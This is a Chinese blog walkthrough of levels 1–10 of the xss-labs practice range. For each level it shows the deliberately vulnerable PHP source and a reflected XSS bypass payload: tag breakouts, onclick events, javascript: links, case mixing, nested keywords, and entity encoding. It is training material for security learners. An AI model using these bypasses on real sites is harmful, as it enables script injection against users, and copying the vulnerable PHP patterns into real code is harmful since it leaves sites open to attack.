xss-labs 1-10关

最新推荐文章于 2024-04-08 18:24:29 发布
最新推荐文章于 2024-04-08 18:24:29 发布
阅读量151 收藏
点赞数
文章标签: 安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/chiza2596/article/details/115254904
版权
第一关
查看源码 
<?php
ini_set("display_errors", 0);
$str = $_GET["name"];
echo "<h2 align=center>欢迎用户".$str."</h2>";
?>
这一关没有任何防御,我们直接构造xss语句进行注入。 
<script>alert(1)</script>
第二关
查看源码 
<?php
ini_set("display_errors", 0);
$str = $_GET["keyword"];
echo "<h2 align=center>没有找到和".htmlspecialchars($str)."相关的结果.</h2>".'<center>
<form action=level2.php method=GET>
<input name=keyword  value="'.$str.'">
<input type=submit name=submit value="搜索"/>
</form>
</center>';
?>
在网页源代码中,我们输入的数据,是在表单中的value属性内,所以需要先闭合input标签,然后再注入代码。 
"><script>alert(1)</script>
本关在h2标签中有防御机制,但是在input中是没有的,所以可以在input中注入。
 
第三关
查看源码 
<?php
ini_set("display_errors", 0);
$str = $_GET["keyword"];
echo "<h2 align=center>没有找到和".htmlspecialchars($str)."相关的结果.</h2>"."<center>
<form action=level3.php method=GET>
<input name=keyword  value='".htmlspecialchars($str)."'>    
<input type=submit name=submit value=搜索 />
</form>
</center>";
?>
输入script,”<“会被转换为html编码,所以这一关无法采用标签,因为标签都是带有"<"的,因此采用事件,需要闭合标签的属性。
onclick事件触发  
">'onclick='alert(1)
所有的地方都被htmlspecialchars函数过滤了,该函数可以过滤“<”“>”““ ”,但是不会过滤单引号,而且value的闭合也是采用单引号,所以会有xss漏洞 。
本关所有的地方有都防御机制,所以需要绕过该防御机制,因此采用事件方法,并且使用单引号闭合,这样就可以绕过函数的html实体化。
第四关
查看源码 
<?php
ini_set("display_errors", 0);
$str = $_GET["keyword"];
$str2=str_replace(">","",$str);
$str3=str_replace("<","",$str2);
echo "<h2 align=center>没有找到和".htmlspecialchars($str)."相关的结果.</h2>".'<center>
<form action=level4.php method=GET>
<input name=keyword  value="'.$str3.'">
<input type=submit name=submit value=搜索 />
</form>
</center>';
?>
先试探防御机制,发现value值中把“<”过滤了,所以采用事件注入。 
"onclick="alert(1)"
本关的防御机制是过滤了尖括号,html标签必须采用的“<”,单号没有考虑事件。
 
第五关
查看源码 
<?php
ini_set("display_errors", 0);
$str = strtolower($_GET["keyword"]);               将数据转化为小写
$str2=str_replace("<script","<scr_ipt",$str);      将script转化为scr_ipt
$str3=str_replace("on","o_n",$str2);               将on转化为o_n
echo "<h2 align=center>没有找到和".htmlspecialchars($str)."相关的结果.</h2>".'<center>
<form action=level5.php method=GET>
<input name=keyword  value="'.$str3.'">
<input type=submit name=submit value=搜索 />
</form>
</center>';
?>
先试探防御机制,这一关把script转换为scr_ipt,所以考虑绕过该机制。 然后发现on也被过滤了,而且所有的事件属性都是带有on的,所以在此处无法采用事件。
采用标签
a标签的href属性 
<a href=‘javascript:alert(1)’>

第六关

查看源码

<?php
ini_set("display_errors", 0);
$str = $_GET["keyword"];                    并没有过滤大小写
$str2=str_replace("<script","<scr_ipt",$str);
$str3=str_replace("on","o_n",$str2);
$str4=str_replace("src","sr_c",$str3);
$str5=str_replace("data","da_ta",$str4);
$str6=str_replace("href","hr_ef",$str5);
echo "<h2 align=center>没有找到和".htmlspecialchars($str)."相关的结果.</h2>".'<center>
<form action=level6.php method=GET>
<input name=keyword  value="'.$str6.'">
<input type=submit name=submit value=搜索 />
</form>
</center>';
?>
分析源码我们发现对事件,标签都有过滤,但并没有过滤大小写。我们可以尝试换成大写后大小写混合就可以。 
"><SCRIPT>alert(1)</SCRIPT>                      "><a HREF="javascript:alert(1)"
第七关
查看源码 
<?php
ini_set("display_errors", 0);
$str =strtolower( $_GET["keyword"]);           将数据转化为小写
$str2=str_replace("script","",$str);
$str3=str_replace("on","",$str2);
$str4=str_replace("src","",$str3);
$str5=str_replace("data","",$str4);
$str6=str_replace("href","",$str5);
echo "<h2 align=center>没有找到和".htmlspecialchars($str)."相关的结果.</h2>".'<center>
<form action=level7.php method=GET>
<input name=keyword  value="'.$str6.'">
<input type=submit name=submit value=搜索 />
</form>
</center>';
?>
先试探防御机制,我们发现script被过滤了 
<>alert(1)</>
我们采用嵌套的方法 
<scscript>alert(1)</scscript>
发现可以使用,然后我们构造闭合 
"><scscriptript>alert(1)</scscriptript>
若采用事件注入,也是同样的方法。
  
"oonnclick="alert(1)"

第八关

查看源码 
<?php
ini_set("display_errors", 0);
$str = strtolower($_GET["keyword"]);
$str2=str_replace("script","scr_ipt",$str);
$str3=str_replace("on","o_n",$str2);
$str4=str_replace("src","sr_c",$str3);
$str5=str_replace("data","da_ta",$str4);
$str6=str_replace("href","hr_ef",$str5);
$str7=str_replace('"','&quot',$str6);
echo '<center>
<form action=level8.php method=GET>
<input name=keyword  value="'.htmlspecialchars($str).'">
<input type=submit name=submit value=添加友情链接 />
</form>
</center>';
?>
通过试探,发现无法构造闭合,原因是采用了htmlspecialchars($str)函数,而且闭合方式是双引号,所以input中无法注入,但是在连接里面是有地方可以注入的,首先是试探是否有防御机制: 
<scr_ipt>alert(1)</scr_ipt>
对script,事件,标签都做了过滤
我们尝试用复写绕过,发现还是没有办法 
<scscript>alert(1)</scscript>
那我们进行编码尝试 (采用html实体编码)
  
&#x6a;&#x61;&#x76;&#x61;&#x73;&#x63;&#x72;&#x69;&#x70;&#x74;&#x3a;&#x61;&#x6c;&#x65;&#x72;&#x74;&#x28;&#x31;&#x29;&#x0a;&#x0a;&#x0a;&#x0a;&#x0a;&#x0a;&#x0a;
现在就ok了。
第九关
查看源码 
<?php
ini_set("display_errors", 0);
$str = strtolower($_GET["keyword"]);
$str2=str_replace("script","scr_ipt",$str);
$str3=str_replace("on","o_n",$str2);
$str4=str_replace("src","sr_c",$str3);
$str5=str_replace("data","da_ta",$str4);
$str6=str_replace("href","hr_ef",$str5);
$str7=str_replace('"','&quot',$str6);
echo '<center>
<form action=level9.php method=GET>
<input name=keyword  value="'.htmlspecialchars($str).'">
<input type=submit name=submit value=添加友情链接 />
</form>
</center>';
?>
<?php
if(false===strpos($str7,'http://'))    进行判断有没有,strpos() 函数查找字符串在另一字符串中第一次出现的位置。
{
  echo '<center><BR><a href="您的链接不合法?有没有!">友情链接</a></center>';
        }
else
{
  echo '<center><BR><a href="'.$str7.'">友情链接</a></center>';
}
?>
我们向之前一样进行xss注入,发现都是下图的结果
 
查看源码我们发现和之前的一样,过滤了大小写和其他的语句,但不一样的是多了一个strpos()函数    (strpos()函数查找字符串在另一字符串中第一次出现的位置)
其他办法都不行我们尝试编码,我们使用Unicode工具转码。
 
但是输入转码后的内容后我们发现还是和之前的情况一样,分析源码后得知问题出现在strpos()这个函数上,它会通过strpos()函数查询我们有没有输入http://,没有的话就会跳转到之前的那个页面。
现在我们就可以构造语句来进行xss注入了 
&#106;&#97;&#118;&#97;&#115;&#99;&#114;&#105;&#112;&#116;&#58;&#97;&#108;&#101;&#114;&#116;&#40;&#49;&#41;//http://
我们也可以使用字符实体编码构造语句 
javasc&#x72;ipt:alert(1)//http://
第十关
 
没有输入框,也没有超链接了。不过可以观察到页面的输出和url中的keyword参数有关。
查看源码发现有三个不同的参数
 
我们将这三个参数传过去
 
发现只有t_sort这个参数可以利用
 
我们利用t_sort这个参数来写入恶意代码
  
t_sort=" onclick=alert(1) type="text"
小陈是个憨憨
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
XSS-labs1-5
qq_64332865的博客
02-24 436
第一 查看源代码 从这里我们可以看到它将name的参数值,插入到了<h2> </h2>标签之间 那么就很明显,这一主要就是考察反射型xss 但是由于不知道服务器端对于提交的敏感字符有没有过滤,所以这里直接在name参数 中赋值一个简单的弹窗来进行测试。 操作如下: 将name参数重新赋值:<script>alert( 'xss ')</ script> 点击确定,进入第二 首先查看源代码 输入 <script>...
xss-labs1-10
qq_46527080的博客
12-25 244
第一 第一超级简单直接插入常规表单 http://127.0.0.1:8086/xss/level1.php?name=<script>alert("xss")</script> 第二(html实体转换过滤) 源码分析 运用了htmlspecialchars函数,htmlspecialchars — 将特殊字符转换为 HTML 实体,本函数会返回字符转义后的表示。 运用此函数的意思就是将http://127.0.0.1:8086/xss/level2.php?keyword
Xss-labs(1)第一到第十一
m0_46412408的博客
09-25 730
Xss-labs靶场训练第一:查看页面源代码回显playload长度:插入一段js代码,get传参,一个简单的插入顺利来到第二,二话不说先直接尝试插入,并没有成功:查看页面源代码:特殊字符被实体转义了我们需要闭合掉双引号即可,构造payload,这一是闭合绕过来到第三,随便输入一个闭合弹窗试试,符号也被实体化了:查看php源码。
XSS-10注入靶场闯(小游戏)——第十
qq_39330735的博客
02-04 355
XSS-game-10隐藏入口注入,需要在源代码查找到入口的html标签,然后修改对应的属性让其显示出来。然后再注入payload
XSSxss-labs-level10
Hugu
02-23 350
文章目录0x01 XSS-Labs0x02 实验工具0x03 实验环境0x04 实验步骤0x05 实验分析0x06 参考链接 0x01 XSS-Labs   XSS(跨站脚本攻击)是指恶意攻击者往Web页面里插入恶意Script代码,当用户浏览该页之时,嵌入其中Web里面的Script代码会被执行,从而达到恶意攻击用户的目的。   XSS按照利用方式主要分为:反射型XSS、存储型XSS、DOM型XSS。反射型XSS是攻击者事先制作好攻击链接, 需要欺骗用户自己去点击链接才能触发XSS代码(服务器中没有这样的
xss-labs/level10
m0_71299382的博客
11-29 212
xss-labs/level10
xss-labs-master.rar
05-09
"xss-labs-master.rar" 提供了一个针对XSS漏洞的专项练习平台,旨在帮助初学者及安全爱好者提升对XSS攻击的理解和防御能力。这个靶机资源共分为二十个卡,由浅入深,逐步引导用户掌握XSS攻防的核心技巧。 一、XSS...
xss-labs-master源码
07-06
"xss-labs-master"是一个专门设计的靶场,包含了20个级别的XSS练习,旨在帮助学习者深入理解和掌握XSS攻击的原理、类型以及防御策略。通过逐步解决这些精心设计的挑战,我们可以逐步提升对XSS攻击的理解,并提升安全...
xss-labs-master.zip(xss注入通游戏/靶场)
03-21
`xss-labs-master.zip`包含了一个专门用于学习和实践XSS注入的通游戏或靶场,对于网络安全测试人员来说,这是一个极好的学习资源。 **XSS分类** 1. **存储型XSS**:也称为持久型XSS,攻击者将恶意脚本存入服务器...
xss-labs.zip
03-18
XSS(Cross-Site Scripting)是一种常见的网络安全漏洞,它允许攻击者在用户浏览器中注入恶意脚本...记住,理解和掌握XSS防护措施对于任何Web开发者来说都是至重要的,因为这直接影响到网站的用户体验和数据安全性。
渗透测试之XSSxss-labs 1-10总结
白帽子九一
11-18 947
XSS原理: 全称跨站脚本,某种意义上也是一种注入攻击,指攻击者在被攻击的页面上注入恶意脚本代码,受害者访问该页面时,恶意代码会在用户的浏览器上执行。xss不仅扩展javascript代码,还包括flash等其他脚本语言。xss攻击针对的是客户端的攻击,受害者是用户,网站管理员也是用户之一,攻击者可以假冒管理员身份对网站实施攻击。 产生的危害有: 盗取cookie,修改网页内容,网页挂马,利用网页重定向,xss蠕虫。 第一: 没有输入框,那直接在url中写入一段js代码试试(get型): <scri
xss-labs靶场训练(10-13
ldzhhh的博客
05-23 943
第十 先用<script>alert(xss)</script>试试 这里发现一个隐藏的form表单,里面有3个隐藏的变量:t_link、t_history、t_sort。 把三个参数都传进去试试看: http://192.168.121.129/xss/level10.php?keyword=well done!&t_link=1&t_history=2&t_sort=3 发现t_sort可以传入参数,构造Payload: t_sort=<sc
XSS-Labs靶场“1-5”教程
钟言的博客
03-04 7045
本篇为XSS-Labs靶场的第1-5教程,详细内容包含了:一、了解XSS 1、认识XSS攻击 2、XSS攻击危害 3、XSS攻击防御 4、反射型XSS 5、常用XSS攻击语何二、第一 不做限制三、第二 逃逸双引号四、第三 单引号绕过五、第四 过滤第五a标签绕过六、等等内容
xss-labs 6-10
h0ld1rs的博客
07-22 398
xss-labs 6--10第6第7第8第910 第6 将上一的答案输进来查看源代码 得到的源代码 r后面多了下划线,得,又ban一个 经过upload-labs和sqli-labs 的训练,可以确定应该会有大小写,双写这样的题,我们先试一下 把他ban掉的r换成大写R "><a hRef='javascript:alert(/xss/)'> 得到结果 第7 把第六的代码扔进去,查看源代码 结果很明显了,href没了,script也没了,被ban了,开始将他
XSS 跨站脚本漏洞总结(知识点+实例)
叶子的Blog
10-24 1964
XSS 简介 XSS,全称Cross Site Scripting,即跨站脚本攻击,是最普遍的Web应用安全漏洞。这类漏洞能够使得攻击者嵌入恶意脚本代码到正常用户会访问到的页面中,当正常用户访问该页面时,则可导致嵌入的恶意脚本代码的执行,从而达到恶意攻击用户的目的。需要强调的是,XSS不仅仅限于JavaScript,还包括flash等其它脚本语言。根据攻击代码的工作方式,XSS可以分为反射型的XSS、存储型的XSS和DOM型的XSS。 反射型 反射型的XSS是非持久化的,攻击者事先制作好攻击链接,需要
xss绕过尖括号和双括号_XSSwp(未完待续,目前13)
weixin_42309456的博客
12-16 647
1.LEVEL 1审计源码:注意这几行:<?php ini_set("display_errors", 0); $str = $_GET["name"]; echo "<h2 align=center>欢迎用户".$str."</h2>"; ?> GET方式传送一个参数name ,然后直接拼接echo所以给name直接传个最简单的xss弹窗即可:2.LEVEL...
初识渗透之文件操作练习
最新发布
2301_79933084的博客
04-08 461
h2 align=center>没有找到和' onclick=alert(1) --+相的结果.</h2><center>">需要居中的内容</div><BR><a href="<scr_ipt>alert(1)</scr_ipt>">友情链接</a><h2 align=center>没有找到和<>'"相的结果.</h2><center><h2 align=center>没有找到和<>'"相的结果.</h2><center>"/> <a href="javascript:alert(1)">点我!
xss-labl 练习 (1--10
qq_46116117的博客
07-09 227
xss-lab 第一 将name的值直接输出 可以利用 <script>alert(1)</script> 弹窗 第二 使用第一的方法 行不通 查看php源代码,在github上下载 <?php ini_set("display_errors", 0); $str = $_GET["keyword"]; echo "<h2 align=center>没有找到和".htmlspecialchars($str)."相的结果.</h2>".'
xss-labs靶场通payload
weixin_51339377的博客
04-18 695
地址: 欢迎来到XSS挑战 流程: 1.正常人 正常去输入即可 2.标准测试代码输入 找相应的互动点有哪些 查看网页源代码 3.寻找注入点 构造payload提交即可 ssaq.com dsds' value=javascript:alert(1) Level1 url:https://xssaq.com/yx/level1.php?name=test <h2 align=center>欢迎用户test</h2><center><..
xss-labs第14
08-18
XSS-labs的第14中,我没有找到相的引用内容来提供详细信息或解答您的问题。 但是,XSS-labs是一个用于学习和测试跨站脚本攻击(XSS)的平台,每个卡都有不同的挑战和漏洞。在第14中,您可能需要利用某种XSS漏洞来完成任务。您可以尝试查看卡的源代码、输入不同的payload来测试和找到漏洞,并以创造性的方式绕过安全措施。请记住,在现实世界中,利用XSS漏洞是违法的行为,请确保您只在合法的环境中进行测试和学习。<span class="em">1</span><span class="em">2</span><span class="em">3</span> #### 引用[.reference_title] - *1* *2* [XSS-labs通](https://blog.csdn.net/u010277543/article/details/120937928)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_search_pc_result","utm_medium":"distribute.pc_search_result.none-task-cask-2~all~insert_cask~default-1-null.142^v93^chatsearchT3_1"}}] [.reference_item style="max-width: 50%"] - *3* [渗透测试之---xss-labs闯【1-14】](https://blog.csdn.net/qq_43168364/article/details/105523753)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_search_pc_result","utm_medium":"distribute.pc_search_result.none-task-cask-2~all~insert_cask~default-1-null.142^v93^chatsearchT3_1"}}] [.reference_item style="max-width: 50%"] [ .reference_list ]
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值